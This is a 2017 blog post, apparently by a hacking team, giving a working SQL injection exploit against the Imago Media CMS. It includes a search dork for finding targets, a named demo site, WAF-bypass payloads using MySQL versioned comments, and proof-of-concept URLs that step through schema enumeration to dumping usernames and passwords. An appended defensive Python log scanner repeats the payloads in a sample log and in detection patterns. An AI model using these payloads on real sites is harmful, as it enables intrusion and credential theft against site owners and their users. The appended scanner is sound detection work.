Posted by: KaliGhane, Tuesday, 07 March 2017
// Author : Zbyte
// Team : K33P-S1L3NT
// Notif : Ternate Lab Pentesting
// page : https://www.facebook.com/loading.gov
// channel : https://www.youtube.com/channel/UChFMZ01R8Z1mhh2tWc-BddQ
// Greets : QueenAisyah | geek_Defcon | kazutto_kun | s1puT | Badaki | 1!0N7!N | i.am_geek | Admiral | Kopral
// CMS : http://imagomedia.co.id/
// DORK : inurl:/hal-visi-misi ext:html
// Admin page : site.com/user/index.php or site.com/admin/
// Special : Overload Team | Cyber Team Cirebon | Mr.Trouble5hooting
// Demo : http://imagomedia.co.id/notif.php
+ IMAGO MEDIA CMS SQL INJECTION +
-----------------------------

Description
===========
###############################################################
( string ) code ( ' ) <= append a single quote to the string parameter; a blank page, or a page whose images no longer reload, means the parameter is vulnerable
( bug SQL INJECTION )
( +--+ ) <= magic code (comments out the rest of the original query)
/*!union*/+/*!select*/ <= code for bypassing a WAF that answers 406 Not Acceptable
/*!12345union*/+/*!12345select*/ <= code for bypassing a WAF that answers 403 Forbidden
the magic number is found in column ( 9 )
( and false ) <= trick to make the magic number show
( version() ) <= code to check the database version
( database() ) <= code to check the database name

code for displaying table names
------------------------------
group_concat(table_name) from+information_schema.tables+where+table_schema=database()

code for displaying table names (WAF bypass)
--------------------
group_concat(/*!table_name*/) from+information_schema./*!tables*/ where /*!table_schema*/=database()

code for displaying column names
-----------------------------
group_concat(column_name) from+information_schema.columns+where+table_name=0xtablename

code for displaying column names (WAF bypass)
-----------------------------------------
group_concat(/*!column_name*/) from information_schema./*!columns*/ where /*!table_name*/=0x7461626c656d616e6573 <= the table name, hex-encoded

code for displaying username & password
--------------------------------------
group_concat(username,0x3a,pswd,0x3a,status) from+tablemanes
###############################################################

Proof of Concept
----------------
site.com/hal-visi-misi.html <= default
site.com/hal-visi-misi'.html
site.com/hal-visi-misi' order by 10+--+.html
site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,9,10+--+.html
site.com/hal-visi-misi' /*!union*/+/*!select*/+1,2,3,4,5,6,7,8,9,10+--+.html
site.com/hal-visi-misi' /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html
site.com/hal-visi-misi' and false /*!12345union*/+/*12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html
site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html <=
site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,version(),10+--+.html
site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,database(),10+--+.html
site.com/hal-visi-misi' and false /*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,group_concat(/*!table_name*/),10+from+information_schema./*!tables*/ where /*!table_schema*/=database()+--+.html
site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,group_concat(/*!column_name*/),10+from information_schema./*!columns*/ where /*!table_name*/=0x7461626c656d616e6573+--+.html
site.com/hal-visi-misi' union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,pswd,0x3a,status),10+from+tablemanes+--+.html
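Added example, not part of the original post and not code from the CMS vendor: a small Python scanner that flags the request shapes shown above in Apache-style access logs. The log lines inside it are constructed for this example (documentation-range client addresses, the post's date), and the signature names are my own. It demonstrates the defensive side of the write-up's central trick: a filter that matches the literal words `union select` misses MySQL versioned comments such as `/*!union*/` and `/*!12345select*/`, so the scanner URL-decodes the path and strips those comment delimiters before matching, while a comment without `!` (which MySQL does not execute) is dropped entirely.

```python
"""Flag UNION-based SQL injection probes in web-server access logs.

Added example for the write-up above; the log lines are constructed and the
signature set is illustrative, not an exhaustive ruleset.
"""
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# MySQL versioned comment /*!12345 body */ or /*! body */: the server
# executes the body, so for matching we keep the body and drop the markers.
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.DOTALL)
# A plain /* ... */ comment is ignored by the server, so drop it entirely.
PLAIN_COMMENT = re.compile(r"/\*(?!!).*?\*/", re.DOTALL)

# Stages of the attack described in the write-up (names are my own).
SIGNATURES = {
    "order_by_probe": re.compile(r"'\s*order\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\b\s+\bselect\b", re.I),
    "schema_enum": re.compile(r"information_schema\s*\.\s*(tables|columns)", re.I),
    "credential_dump": re.compile(r"group_concat\s*\(\s*username", re.I),
    "version_probe": re.compile(r"\b(version|database)\s*\(\s*\)", re.I),
}

# Apache combined log format: client, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def normalize(decoded_path: str) -> str:
    """Strip MySQL comment tricks so the signatures see plain SQL tokens."""
    text = VERSIONED_COMMENT.sub(r" \1 ", decoded_path)  # /*!union*/ -> union
    text = PLAIN_COMMENT.sub(" ", text)                  # /*12345select*/ -> (gone)
    return re.sub(r"\s+", " ", text)


def classify(raw_path: str) -> List[str]:
    """Return the names of every signature the request path matches."""
    decoded = unquote_plus(raw_path)  # %27 -> ', %20 and + -> space
    hits = []
    # Any C-style comment in a URL path is suspicious on its own, whether or
    # not the SQL inside it would execute.
    if "/*" in decoded:
        hits.append("inline_comment_in_path")
    norm = normalize(decoded)
    hits.extend(name for name, pat in SIGNATURES.items() if pat.search(norm))
    return hits


def scan_log(lines) -> List[Dict]:
    """Parse combined-format lines and keep the ones that match a signature."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify(m["path"])
        if hits:
            findings.append({"client": m["client"], "ts": m["ts"],
                             "path": m["path"], "status": int(m["status"]),
                             "hits": hits})
    return findings


def summarize(findings: List[Dict]) -> Dict[str, List[str]]:
    """Group matched signatures per client so a scan sequence stands out."""
    per_client: Dict[str, set] = {}
    for f in findings:
        per_client.setdefault(f["client"], set()).update(f["hits"])
    return {c: sorted(s) for c, s in per_client.items()}


# Constructed sample log: one benign visitor and one client walking through
# the steps of the proof of concept (quote probe, column count, union,
# comment-obfuscated union, schema enumeration, credential dump).
_UA = '"-" "Mozilla/5.0"'
SAMPLE_LOG = [
    f'198.51.100.7 - - [07/Mar/2017:10:14:58 +0000] "GET /hal-visi-misi.html HTTP/1.1" 200 5123 {_UA}',
    f'203.0.113.10 - - [07/Mar/2017:10:15:01 +0000] "GET /hal-visi-misi%27.html HTTP/1.1" 500 0 {_UA}',
    f'203.0.113.10 - - [07/Mar/2017:10:15:04 +0000] "GET /hal-visi-misi%27%20order%20by%2010+--+.html HTTP/1.1" 200 5123 {_UA}',
    f'203.0.113.10 - - [07/Mar/2017:10:15:09 +0000] "GET /hal-visi-misi%27%20union+select+1,2,3,4,5,6,7,8,9,10+--+.html HTTP/1.1" 406 0 {_UA}',
    f'203.0.113.10 - - [07/Mar/2017:10:15:15 +0000] "GET /hal-visi-misi%27%20/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,9,10+--+.html HTTP/1.1" 200 5140 {_UA}',
    f'203.0.113.10 - - [07/Mar/2017:10:15:22 +0000] "GET /hal-visi-misi%27%20and%20false%20/*!12345union*/+/*!12345select*/+1,2,3,4,5,6,7,8,group_concat(/*!table_name*/),10+from+information_schema./*!tables*/%20where%20/*!table_schema*/=database()+--+.html HTTP/1.1" 200 5210 {_UA}',
    f'203.0.113.10 - - [07/Mar/2017:10:15:30 +0000] "GET /hal-visi-misi%27%20union+select+1,2,3,4,5,6,7,8,group_concat(username,0x3a,pswd,0x3a,status),10+from+tablemanes+--+.html HTTP/1.1" 200 5300 {_UA}',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client"], f["status"], f["hits"])
    print(summarize(scan_log(SAMPLE_LOG)))
```

Note that the lone single-quote probe (second line) matches no signature by itself; in practice it is worth correlating 5xx responses that carry a `'` in the path with the later stages from the same client, which is what `summarize` makes visible.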

- Copyright © KaliGhane - Coro Terbang Team - Powered by Blogger - Designed by KaliGhane -